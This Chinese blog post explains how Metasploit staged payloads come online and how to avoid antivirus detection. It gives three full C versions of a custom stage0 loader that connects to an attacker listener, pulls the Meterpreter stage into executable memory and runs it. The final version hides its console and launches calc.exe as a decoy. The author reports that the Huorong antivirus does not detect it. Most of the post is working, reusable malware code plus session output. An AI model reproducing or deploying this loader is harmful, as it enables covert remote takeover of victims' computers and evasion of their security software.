<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 8.1.1">

  <link rel="apple-touch-icon" sizes="180x180" href="/image/favicons/apple-touch-icon.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/image/favicons/favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/image/favicons/favicon-16x16.png">
  <link rel="mask-icon" href="/image/favicons/favicon.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/7.0.0/css/all.min.css" integrity="sha256-VHqXKFhhMxcpubYf9xiWdCiojEbY9NexQ4jh8AxbvcM=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancyapps-ui/5.0.31/fancybox/fancybox.css" integrity="sha256-gkQVf8UKZgQ0HyuxL/VnacadJ+D2Kox2TCEBuNQg5+w=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"paoka1.top","root":"/","images":"/images","scheme":"Gemini","darkmode":false,"version":"8.26.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"always","padding":18,"offset":12},"hljswrap":true,"codeblock":{"theme":{"light":"default","dark":"stackoverflow-dark"},"prism":{"light":"prism","dark":"prism-dark"},"copy_button":{"enable":true,"style":"default"},"fold":{"enable":false,"height":500},"language":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":false,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.json","localsearch":{"enable":true,"top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js" defer></script>

    <meta name="description" content="对 MSF 上线和免杀的探究 MSF 上线过程 环境：  Windows7 64 位，ip：192.168.52.133  Kali Linux，ip：192.168.52.135  Windows10 64 位：gcc 编译环境    我们先说一下分段加载，什么是分段加载呢？举个例子，在 Web 渗透中遇到存在文件上传漏洞，先上传一个小马，这个小马的功能就是用于上传大马，木马的功能由大马实现，小">
<meta property="og:type" content="article">
<meta property="og:title" content="MSF 上线探究与免杀">
<meta property="og:url" content="https://paoka1.top/2023/06/18/MSF-%E4%B8%8A%E7%BA%BF%E6%8E%A2%E7%A9%B6%E4%B8%8E%E5%85%8D%E6%9D%80/index.html">
<meta property="og:site_name" content="Paoka1&#39;s Blog">
<meta property="og:description" content="对 MSF 上线和免杀的探究 MSF 上线过程 环境：  Windows7 64 位，ip：192.168.52.133  Kali Linux，ip：192.168.52.135  Windows10 64 位：gcc 编译环境    我们先说一下分段加载，什么是分段加载呢？举个例子，在 Web 渗透中遇到存在文件上传漏洞，先上传一个小马，这个小马的功能就是用于上传大马，木马的功能由大马实现，小">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://paoka1.top/image/post/2023/06/shell_1.png">
<meta property="og:image" content="https://paoka1.top/image/post/2023/06/shell_2.png">
<meta property="og:image" content="https://paoka1.top/image/post/2023/06/miansha.png">
<meta property="article:published_time" content="2023-06-18T10:04:57.000Z">
<meta property="article:modified_time" content="2025-03-15T05:17:11.349Z">
<meta property="article:author" content="Paoka1">
<meta property="article:tag" content="MSF">
<meta property="article:tag" content="免杀">
<meta property="article:tag" content="渗透测试">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://paoka1.top/image/post/2023/06/shell_1.png">


<link rel="canonical" href="https://paoka1.top/2023/06/18/MSF-%E4%B8%8A%E7%BA%BF%E6%8E%A2%E7%A9%B6%E4%B8%8E%E5%85%8D%E6%9D%80/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://paoka1.top/2023/06/18/MSF-%E4%B8%8A%E7%BA%BF%E6%8E%A2%E7%A9%B6%E4%B8%8E%E5%85%8D%E6%9D%80/","path":"2023/06/18/MSF-上线探究与免杀/","title":"MSF 上线探究与免杀"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>MSF 上线探究与免杀 | Paoka1's Blog</title>
  








  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/fancyapps-ui/5.0.31/fancybox/fancybox.umd.js" integrity="sha256-a+H7FYzJv6oU2hfsfDGM2Ohw/cR9v+hPfxHCLdmCrE8=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.5.0/search.js" integrity="sha256-xFC6PJ82SL9b3WkGjFavNiA9gm5z6UBxWPiu4CYjptg=" crossorigin="anonymous" defer></script>
<script src="/js/third-party/search/local-search.js" defer></script>




  <script src="/js/third-party/fancybox.js" defer></script>



  





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Paoka1's Blog</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">Welcome to my blog</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
      <div class="search-header">
        <span class="search-icon">
          <i class="fa fa-search"></i>
        </span>
        <div class="search-input-container">
          <input autocomplete="off" autocapitalize="off" maxlength="80"
                placeholder="搜索..." spellcheck="false"
                type="search" class="search-input">
        </div>
        <span class="popup-btn-close" role="button">
          <i class="fa fa-times-circle"></i>
        </span>
      </div>
      <div class="search-result-container">
        <div class="search-result-icon">
          <i class="fa fa-spinner fa-pulse fa-5x"></i>
        </div>
      </div>
    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#MSF-%E4%B8%8A%E7%BA%BF%E8%BF%87%E7%A8%8B"><span class="nav-number">1.</span> <span class="nav-text">MSF 上线过程</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%BC%96%E5%86%99-stage0-%E9%98%B6%E6%AE%B5"><span class="nav-number">2.</span> <span class="nav-text">编写 stage0 阶段</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Paoka1"
      src="/image/favicons/favicon.ico">
  <p class="site-author-name" itemprop="name">Paoka1</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">27</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">11</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">24</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <a href="https://github.com/paoka1" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;paoka1" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:shauio@163.com" title="E-Mail → mailto:shauio@163.com" rel="noopener me" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://paoka1.top/2023/06/18/MSF-%E4%B8%8A%E7%BA%BF%E6%8E%A2%E7%A9%B6%E4%B8%8E%E5%85%8D%E6%9D%80/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/image/favicons/favicon.ico">
      <meta itemprop="name" content="Paoka1">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Paoka1's Blog">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="MSF 上线探究与免杀 | Paoka1's Blog">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          MSF 上线探究与免杀
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2023-06-18 18:04:57" itemprop="dateCreated datePublished" datetime="2023-06-18T18:04:57+08:00">2023-06-18</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2025-03-15 13:17:11" itemprop="dateModified" datetime="2025-03-15T13:17:11+08:00">2025-03-15</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E6%B8%97%E9%80%8F%E7%BA%A2%E9%98%9F/" itemprop="url" rel="index"><span itemprop="name">渗透红队</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><p>对 MSF 上线和免杀的探究</p>
<h3 id="MSF-上线过程"><a href="#MSF-上线过程" class="headerlink" title="MSF 上线过程"></a>MSF 上线过程</h3><blockquote>
<p>环境：</p>
<ol>
<li><p>Windows7 64 位，ip：192.168.52.133</p>
</li>
<li><p>Kali Linux，ip：192.168.52.135</p>
</li>
<li><p>Windows10 64 位：gcc 编译环境</p>
</li>
</ol>
</blockquote>
<p>我们先说一下分段加载，什么是分段加载呢？举个例子，在 Web 渗透中遇到存在文件上传漏洞，先上传一个小马，这个小马的功能就是用于上传大马，木马的功能由大马实现，小马仅仅是作为一个桥梁，把大马上传到服务器上，连接过程：</p>
<ol>
<li>shellcode 连接服务器</li>
<li>接收服务器发送过来的 stage1</li>
<li>阶段载荷</li>
<li>反射 dll 注入</li>
<li>实现 meterpreter</li>
</ol>
<span id="more"></span>

<p>其中 stage0 就是上面说的小马，主要的功能就是与服务器进行通信，拉取 stage1 阶段载荷，我们平时使用 msfvenom 生成的 shellcode 就是 stage0 阶段的载荷，实现 meterpreter 功能的并不是这一串 shellcode，我们在平时使用 msf 上线时通常会看到 Sending stage 这行代码，这是 MSF 在向客户端发送 stage1 阶段的载荷：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">msf6 exploit(multi/handler) &gt; exploit </span><br><span class="line"></span><br><span class="line">[*] Started reverse TCP handler on 192.168.52.135:9999 </span><br><span class="line">[*] Sending stage (175174 bytes) to 192.168.52.133</span><br><span class="line">[*] Meterpreter session 1 opened (192.168.52.135:9999 -&gt; 192.168.52.133:49160 ) at 2023-06-15 18:30:06 +0800</span><br></pre></td></tr></table></figure>

<p>其中 stage1 阶段的载荷是一个叫做 metsrv 的 dll，服务端把这个 dll 发送过去，客户端通过反射 dll 注入方式执行这个 dll，才可以上线 MSF，如果监听时设置的载荷是 64 位的，那么 stage1 阶段的载荷就是<code>metsrv.x64.dll</code>，如果设置的载荷是 32 位的 stage1 阶段的载荷就是<code>metsrv.x86.dll</code></p>
<h3 id="编写-stage0-阶段"><a href="#编写-stage0-阶段" class="headerlink" title="编写 stage0 阶段"></a>编写 stage0 阶段</h3><p>我们可以自己编写 stage0 来加载 MSF 的 stage，思路参考：<a target="_blank" rel="noopener" href="https://forum.butian.net/share/1614">msf上线原理与自写stage绕过杀软</a>，写出来是这样（按需要修改 ip、port 为 Kali MSF 监听的，详细的代码分析请参考上面提到的链接）：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;Windows.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">pragma</span> comment(lib, <span class="string">&quot;ws2_32.lib&quot;</span>)</span></span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">main</span><span class="params">()</span> &#123;</span><br><span class="line">    WSADATA ws_Data;</span><br><span class="line">    WSAStartup(MAKEWORD(<span class="number">2</span>, <span class="number">2</span>), &amp;ws_Data);</span><br><span class="line"></span><br><span class="line">    SOCKET sock = socket(AF_INET, SOCK_STREAM, <span class="number">0</span>);</span><br><span class="line">    SOCKADDR_IN sock_info = &#123; <span class="number">0</span> &#125;;</span><br><span class="line">    sock_info.sin_family = AF_INET;</span><br><span class="line">    sock_info.sin_addr.S_un.S_addr = inet_addr(<span class="string">&quot;192.168.52.135&quot;</span>);</span><br><span class="line">    sock_info.sin_port = htons(<span class="number">9999</span>);</span><br><span class="line">    connect(sock, (SOCKADDR*)&amp;sock_info, <span class="keyword">sizeof</span>(SOCKADDR_IN));</span><br><span class="line"></span><br><span class="line">    DWORD recvSize;</span><br><span class="line">    recv(sock, (<span class="type">char</span>*)&amp;recvSize, <span class="keyword">sizeof</span>(DWORD), <span class="number">0</span>);</span><br><span class="line">    PBYTE recbuf = (PBYTE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, recvSize);</span><br><span class="line">    DWORD recvSize2 = recvSize;</span><br><span class="line">    PBYTE recbuf2 = recbuf;</span><br><span class="line"></span><br><span class="line">    DWORD i = <span class="number">1</span>;</span><br><span class="line">    <span class="keyword">while</span> (i &gt; <span class="number">0</span> &amp;&amp; recvSize &gt; <span class="number">0</span>) &#123;</span><br><span class="line">        i = recv(sock, (<span class="type">char</span>*)recbuf, recvSize, <span class="number">0</span>);</span><br><span class="line">        <span class="comment">// 越过第一次接收的数据</span></span><br><span class="line">        recbuf = recbuf + i;</span><br><span class="line">        recvSize = recvSize - i;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    VirtualProtect(recbuf2, recvSize2, PAGE_EXECUTE_READWRITE, &amp;recvSize);</span><br><span class="line">    __asm &#123;</span><br><span class="line">        mov edi, sock;</span><br><span class="line">        jmp recbuf2;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>原文使用 VS 编译，我使用 VS 编译通过，但因 win7 上缺少某些 DLL，运行失败，缺少的依赖应该和 VS 有关，也就是说安装 VS 后应该能解决缺少 DLL 的问题，但如果目标电脑没有安装 VS 呢？于是我想着能不能修改汇编部分，使用 GCC 来编译，脱离对 VS 的依赖，在网上寻找有关 C GCC 内联汇编有关的资料后，编写了如下的代码：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;windows.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">pragma</span> comment(lib, <span class="string">&quot;ws2_32.lib&quot;</span>)</span></span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">main</span><span class="params">()</span> &#123;</span><br><span class="line">    WSADATA ws_Data;</span><br><span class="line">    WSAStartup(MAKEWORD(<span class="number">2</span>, <span class="number">2</span>), &amp;ws_Data);</span><br><span class="line"></span><br><span class="line">    SOCKET sock = socket(AF_INET, SOCK_STREAM, <span class="number">0</span>);</span><br><span class="line">    SOCKADDR_IN sock_info = &#123; <span class="number">0</span> &#125;;</span><br><span class="line">    sock_info.sin_family = AF_INET;</span><br><span class="line">    sock_info.sin_addr.S_un.S_addr = inet_addr(<span class="string">&quot;192.168.52.135&quot;</span>);</span><br><span class="line">    sock_info.sin_port = htons(<span class="number">9999</span>);</span><br><span class="line">    connect(sock, (SOCKADDR*)&amp;sock_info, <span class="keyword">sizeof</span>(SOCKADDR_IN));</span><br><span class="line"></span><br><span class="line">    DWORD recvSize;</span><br><span class="line">    recv(sock, (<span class="type">char</span>*)&amp;recvSize, <span class="keyword">sizeof</span>(DWORD), <span class="number">0</span>);</span><br><span class="line">    PBYTE recbuf = (PBYTE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, recvSize);</span><br><span class="line">    DWORD recvSize2 = recvSize;</span><br><span class="line">    PBYTE recbuf2 = recbuf;</span><br><span class="line"></span><br><span class="line">    DWORD i = <span class="number">1</span>;</span><br><span class="line">    <span class="keyword">while</span> (i &gt; <span class="number">0</span> &amp;&amp; recvSize &gt; <span class="number">0</span>) &#123;</span><br><span class="line">        i = recv(sock, (<span class="type">char</span>*)recbuf, recvSize, <span class="number">0</span>);</span><br><span class="line">        <span class="comment">// 越过第一次接收的数据</span></span><br><span class="line">        recbuf = recbuf + i;</span><br><span class="line">        recvSize = recvSize - i;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    VirtualProtect(recbuf2, recvSize2, PAGE_EXECUTE_READWRITE, &amp;recvSize);</span><br><span class="line">    __asm__ __volatile__ (</span><br><span class="line">        <span class="string">&quot;movl %0, %%edi \n\t&quot;</span></span><br><span class="line">        <span class="string">&quot;jmp *%1        \n\t&quot;</span></span><br><span class="line">        :</span><br><span class="line">        : <span class="string">&quot;r&quot;</span>(sock), <span class="string">&quot;r&quot;</span>(recbuf2)</span><br><span class="line">        : <span class="string">&quot;%edi&quot;</span></span><br><span class="line">    );</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>编译时的命令：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gcc shell.c -o shell.exe -lws2_32</span><br></pre></td></tr></table></figure>

<p>在 kali 使用 MSF 开启监听，在 Win7 上运行编译好的程序，上线成功！</p>
<p><img src="/image/post/2023/06/shell_1.png" alt="上线 MSF"></p>
<p>但是 Win7 这边会有黑色的控制台，关掉就会导致下线，我们应该隐藏它，并且新启动一个程序来做掩盖，这里选择了计算器来测试：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;windows.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;tchar.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">pragma</span> comment(lib, <span class="string">&quot;ws2_32.lib&quot;</span>)</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// 隐藏控制台</span></span><br><span class="line"><span class="type">void</span> __attribute__ ((constructor)) ctor() &#123;</span><br><span class="line">    HWND window = GetConsoleWindow();</span><br><span class="line">    ShowWindow(window, SW_HIDE);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 创建子进程</span></span><br><span class="line"><span class="type">void</span> <span class="title function_">subprocess</span><span class="params">()</span> &#123;</span><br><span class="line">    STARTUPINFO si;</span><br><span class="line">    PROCESS_INFORMATION pi;</span><br><span class="line"></span><br><span class="line">    ZeroMemory(&amp;si, <span class="keyword">sizeof</span>(si));</span><br><span class="line">    si.cb = <span class="keyword">sizeof</span>(si);</span><br><span class="line">    ZeroMemory(&amp;pi, <span class="keyword">sizeof</span>(pi));</span><br><span class="line"></span><br><span class="line">    CreateProcess(<span class="literal">NULL</span>, <span class="string">&quot;calc.exe&quot;</span>, <span class="literal">NULL</span>, <span class="literal">NULL</span>, FALSE, <span class="number">0</span>, <span class="literal">NULL</span>, <span class="literal">NULL</span>, &amp;si, &amp;pi);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">main</span><span class="params">()</span> &#123;</span><br><span class="line">    WSADATA ws_Data;</span><br><span class="line">    WSAStartup(MAKEWORD(<span class="number">2</span>, <span class="number">2</span>), &amp;ws_Data);</span><br><span class="line"></span><br><span class="line">    SOCKET sock = socket(AF_INET, SOCK_STREAM, <span class="number">0</span>);</span><br><span class="line">    SOCKADDR_IN sock_info = &#123; <span class="number">0</span> &#125;;</span><br><span class="line">    sock_info.sin_family = AF_INET;</span><br><span class="line">    sock_info.sin_addr.S_un.S_addr = inet_addr(<span class="string">&quot;192.168.52.135&quot;</span>);</span><br><span class="line">    sock_info.sin_port = htons(<span class="number">9999</span>);</span><br><span class="line">    connect(sock, (SOCKADDR*)&amp;sock_info, <span class="keyword">sizeof</span>(SOCKADDR_IN));</span><br><span class="line"></span><br><span class="line">    DWORD recvSize;</span><br><span class="line">    recv(sock, (<span class="type">char</span>*)&amp;recvSize, <span class="keyword">sizeof</span>(DWORD), <span class="number">0</span>);</span><br><span class="line">    PBYTE recbuf = (PBYTE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, recvSize);</span><br><span class="line">    DWORD recvSize2 = recvSize;</span><br><span class="line">    PBYTE recbuf2 = recbuf;</span><br><span class="line"></span><br><span class="line">    DWORD i = <span class="number">1</span>;</span><br><span class="line">    <span class="keyword">while</span> (i &gt; <span class="number">0</span> &amp;&amp; recvSize &gt; <span class="number">0</span>) &#123;</span><br><span class="line">        i = recv(sock, (<span class="type">char</span>*)recbuf, recvSize, <span class="number">0</span>);</span><br><span class="line">        <span class="comment">// 越过第一次接收的数据</span></span><br><span class="line">        recbuf = recbuf + i;</span><br><span class="line">        recvSize = recvSize - i;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    subprocess();</span><br><span class="line"></span><br><span class="line">    VirtualProtect(recbuf2, recvSize2, PAGE_EXECUTE_READWRITE, &amp;recvSize);</span><br><span class="line">    __asm__ __volatile__ (</span><br><span class="line">        <span class="string">&quot;movl %0, %%edi \n\t&quot;</span></span><br><span class="line">        <span class="string">&quot;jmp *%1        \n\t&quot;</span></span><br><span class="line">        :</span><br><span class="line">        : <span class="string">&quot;r&quot;</span>(sock), <span class="string">&quot;r&quot;</span>(recbuf2)</span><br><span class="line">        : <span class="string">&quot;%edi&quot;</span></span><br><span class="line">    );</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>再次尝试：</p>
<p><img src="/image/post/2023/06/shell_2.png" alt="上线 MSF"></p>
<p>现在 Win7 只有一闪而过的控制台（我在 win10 进行测试时不会闪出控制台）和一个打开的计算器，就算关闭了计算器，MSF 那边也不会下线，而且对于我们编写的程序：</p>
<p><img src="/image/post/2023/06/miansha.png" alt="火绒免杀"></p>
<p>火绒并未检测出异常。在 Win10 进行测试时，编写的木马仍然不会被火绒查杀，并且可以完成上线的操作</p>
<hr>
<p>本文参考链接：</p>
<p><a target="_blank" rel="noopener" href="https://forum.butian.net/share/1614">msf上线原理与自写stage绕过杀软</a></p>
<p><a target="_blank" rel="noopener" href="https://www.ibiblio.org/gferg/ldp/GCC-Inline-Assembly-HOWTO.html">GCC-Inline-Assembly-HOWTO</a></p>
<p><a target="_blank" rel="noopener" href="https://learn.microsoft.com/en-us/windows/win32/procthread/creating-processes">如何创建子进程</a></p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" rel="tag"># 渗透测试</a>
              <a href="/tags/MSF/" rel="tag"># MSF</a>
              <a href="/tags/%E5%85%8D%E6%9D%80/" rel="tag"># 免杀</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2023/04/24/Tomcat-Agent-%E5%9E%8B%E5%86%85%E5%AD%98%E9%A9%AC/" rel="prev" title="Tomcat Agent 型内存马">
                  <i class="fa fa-angle-left"></i> Tomcat Agent 型内存马
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2023/09/13/CobaltStrike%E4%B8%8D%E5%87%BA%E7%BD%91%E4%B8%8A%E7%BA%BF/" rel="next" title="CobaltStrike不出网上线">
                  CobaltStrike不出网上线 <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 2022 – 
